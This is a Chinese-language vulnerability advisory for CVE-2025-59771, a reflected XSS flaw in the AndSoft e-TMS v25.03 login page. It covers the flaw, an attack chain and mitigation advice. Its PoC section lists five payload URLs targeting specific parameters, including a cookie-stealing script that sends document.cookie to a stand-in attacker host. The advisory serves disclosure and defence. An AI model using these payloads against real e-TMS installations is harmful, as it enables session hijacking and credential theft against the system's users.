CVE-2025-59771：AndSoft e-TMS 反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59771

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59771 是 AndSoft 公司开发的 e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）于2025年9月24日发布的安全公告披露，并于2025年10月2日正式收录至 CVE 数据库。

AndSoft e-TMS 是一款广泛应用于物流和运输行业的运输管理系统，用于管理订单、运输、仓储等业务流程。由于该系统通常部署在企业内网或面向合作伙伴的服务器上，其安全性直接影响到企业的业务运营和数据安全。

该 XSS 漏洞存在于 e-TMS 的登录页面 `/clt/LOGINFRM_MRK.ASP` 中，涉及多个输入参数，包括 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn' 等。攻击者可以通过精心构造包含恶意 JavaScript 代码的 URL，诱使受害者点击该链接。当受害者在浏览器中打开该恶意 URL 时，嵌入在 URL 参数中的恶意脚本将在受害者的浏览器上下文中执行，从而实现会话劫持、凭据窃取、钓鱼攻击或恶意操作等目的。

根据 CVSS 3.1 评分标准，该漏洞的评分为 6.1 分，属于中危级别。虽然漏洞利用需要用户交互（UI:R），且不需要任何认证（PR:N），但其影响范围（C:L/I:L）表明该漏洞可能导致敏感信息泄露和数据篡改，对企业用户构成实质性安全威胁。

技术细节

该漏洞属于典型的反射型跨站脚本（Reflected XSS）漏洞，其根本原因在于 e-TMS v25.03 版本的登录页面 `/clt/LOGINFRM_MRK.ASP' 在处理用户输入时未对多个参数进行充分的过滤和编码。

具体而言，受影响的参数包括 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn'。这些参数的值在服务器端处理后被直接反射回响应页面中，而未经过 HTML 实体编码或其他适当的输出转义处理。攻击者可以在这些参数的值中注入恶意的 JavaScript 代码或 HTML 标签，例如 `<script>alert(document.cookie)</script>` 或 `<img src=x onerror=...>` 等。

漏洞利用方式如下：
1. 攻击者构造一个包含恶意脚本的 URL，例如：`https://target.com/clt/LOGINFRM_MRK.ASP?l=<script>恶意代码</script>`
2. 攻击者通过钓鱼邮件、即时通讯或其他社交工程手段诱使受害者点击该 URL
3. 受害者的浏览器向目标服务器发送请求，服务器将恶意脚本作为响应的一部分返回
4. 浏览器解析响应时执行嵌入的恶意脚本，该脚本在受害者的会话上下文中运行
5. 攻击者可以利用此漏洞窃取会话 Cookie、获取敏感信息、进行钓鱼攻击或执行其他恶意操作

由于该漏洞的 CVSS 向量为 `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`，表明攻击者可以通过网络远程利用，攻击复杂度低，无需认证，但需要受害者进行交互（如点击链接）。漏洞的影响范围为 Changed（S:C），意味着该漏洞可能影响到超出其直接组件的资源。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统使用 AndSoft e-TMS v25.03，通过网络侦察或公开信息确认目标存在漏洞的登录页面 /clt/LOGINFRM_MRK.ASP。

STEP 2

步骤2：构造恶意URL

攻击者利用未过滤的参数（l、demo、demo2、TNTLOGIN、UO、SuppConn），构造包含恶意 JavaScript 代码的 URL，例如在参数值中注入 <script> 标签或事件处理器。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、即时通讯工具、社交媒体或其他社交工程手段，将恶意 URL 发送给目标用户（e-TMS 的合法用户）。

STEP 4

步骤4：诱导用户点击

受害者在浏览器中点击恶意链接，向存在漏洞的 e-TMS 服务器发送请求，服务器将恶意脚本作为响应内容的一部分返回。

STEP 5

步骤5：脚本执行

浏览器解析服务器响应时执行嵌入的恶意 JavaScript 代码，该代码在受害者的会话上下文中运行，可访问会话 Cookie、DOM 内容等敏感信息。

STEP 6

步骤6：数据窃取或恶意操作

攻击者利用执行的脚本窃取用户会话 Cookie、捕获登录凭据、进行钓鱼攻击、篡改页面内容或执行其他恶意操作，从而危害用户和企业的安全。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Reflected XSS Proof of Concept for CVE-2025-59771 -->
<!-- Affected file: /clt/LOGINFRM_MRK.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Basic XSS using 'l' parameter -->
https://target.com/clt/LOGINFRM_MRK.ASP?l=<script>alert('XSS-CVE-2025-59771')</script>

<!-- PoC 2: XSS using 'demo' parameter -->
https://target.com/clt/LOGINFRM_MRK.ASP?demo=<script>alert(document.domain)</script>

<!-- PoC 3: XSS using 'TNTLOGIN' parameter -->
https://target.com/clt/LOGINFRM_MRK.ASP?TNTLOGIN="><img src=x onerror=alert(document.cookie)>

<!-- PoC 4: Cookie stealing PoC using 'UO' parameter -->
https://target.com/clt/LOGINFRM_MRK.ASP?UO=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- PoC 5: XSS using 'SuppConn' parameter -->
https://target.com/clt/LOGINFRM_MRK.ASP?SuppConn=<svg/onload=alert('XSS')>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对所有访问 e-TMS 登录页面 /clt/LOGINFRM_MRK.ASP 的请求进行 URL 参数过滤和监控；2）在 Web 服务器或反向代理层面部署输入过滤规则，拦截包含可疑 JavaScript 代码或 HTML 标签的请求；3）部署 Web 应用防火墙（WAF），启用 XSS 防护规则集；4）对用户进行安全意识培训，提醒用户不要点击来源不明的链接；5）监控异常的网络流量和用户行为，及时发现潜在的 XSS 攻击活动；6）考虑对 e-TMS 系统实施网络访问限制，仅允许可信网络中的用户访问。